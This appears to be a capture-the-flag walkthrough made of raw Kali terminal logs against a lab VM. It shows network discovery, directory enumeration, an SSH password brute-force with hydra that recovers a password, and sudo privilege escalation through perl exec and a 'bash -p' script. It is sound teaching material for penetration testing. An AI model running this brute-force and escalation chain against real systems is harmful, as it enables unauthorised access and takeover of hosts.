┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:dd:48:d1       PCS Systemtechnik GmbH
192.168.31.145  08:00:27:19:2f:ed       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.145
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-18 23:23 EDT
Nmap scan report for 192.168.31.145
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:19:2F:ED (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.145/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .php,.txt,.jpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.145/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.31.145/manual/]
/robots.txt           (Status: 200) [Size: 13]
/server-status        (Status: 403) [Size: 279]

┌──(root㉿kali)-[~/Desktop/tmp]
└─# strings cat.jpg
...
>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hydra -l missyred -P /usr/share/wordlists/rockyou.txt 192.168.31.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-18 23:30:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.31.145:22/
[22][ssh] host: 192.168.31.145   login: missyred   password: iloveyou

missyred@find:~$ sudo -l
[sudo] password for missyred:
Matching Defaults entries for missyred on find:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
    (kings) /usr/bin/perl

missyred@find:~$ sudo -u kings perl -e 'exec "/bin/sh";'

kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
    (ALL) NOPASSWD: /opt/boom/boom.sh

#boom.sh
bash -p